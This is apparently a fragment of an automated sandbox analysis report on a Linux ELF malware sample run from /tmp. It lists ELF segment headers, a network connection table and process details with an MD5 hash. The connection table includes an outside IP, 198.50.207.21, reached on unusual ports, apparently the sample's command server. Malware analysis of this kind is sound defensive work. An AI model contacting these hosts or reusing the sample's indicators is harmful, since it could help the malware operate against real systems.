                                                                        LOAD0x00xdf50000xdf50000x2bbe2f0x2bbe2f7.99990x5R E0x1000
                                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 25, 2024 09:07:40.802947998 CEST42836443192.168.2.2391.189.91.43
                                                                        Oct 25, 2024 09:07:41.826797009 CEST4251680192.168.2.23109.202.202.202
                                                                        Oct 25, 2024 09:07:56.672846079 CEST43928443192.168.2.2391.189.91.42
                                                                        Oct 25, 2024 09:08:06.911504030 CEST42836443192.168.2.2391.189.91.43
                                                                        Oct 25, 2024 09:08:13.054688931 CEST4251680192.168.2.23109.202.202.202
                                                                        Oct 25, 2024 09:08:37.627300024 CEST43928443192.168.2.2391.189.91.42
                                                                        Oct 25, 2024 09:08:49.150661945 CEST102437932198.50.207.21192.168.2.23
                                                                        Oct 25, 2024 09:08:49.151217937 CEST379321024192.168.2.23198.50.207.21
                                                                        Oct 25, 2024 09:08:58.104553938 CEST42836443192.168.2.2391.189.91.43
                                                                        Oct 25, 2024 09:09:30.406687975 CEST102459100198.50.207.21192.168.2.23
                                                                        Oct 25, 2024 09:09:30.406948090 CEST591001024192.168.2.23198.50.207.21

                                                                        System Behavior

                                                                        Start time (UTC):07:07:37
                                                                        Start date (UTC):25/10/2024
                                                                        Path:/tmp/x86_64.bin.elf
                                                                        Arguments:/tmp/x86_64.bin.elf
                                                                        File size:2866968 bytes
                                                                        MD5 hash:c309d84aff381e7831ba2bd5ac72d973

                                                                        Start time (UTC):07:07:37
                                                                        Start date (UTC):25/10/2024
                                                                        Path:/tmp/x86_64.bin.elf
                                                                        Arguments:-
                                                                        File size:2866968 bytes
                                                                        MD5 hash:c309d84aff381e7831ba2bd5ac72d973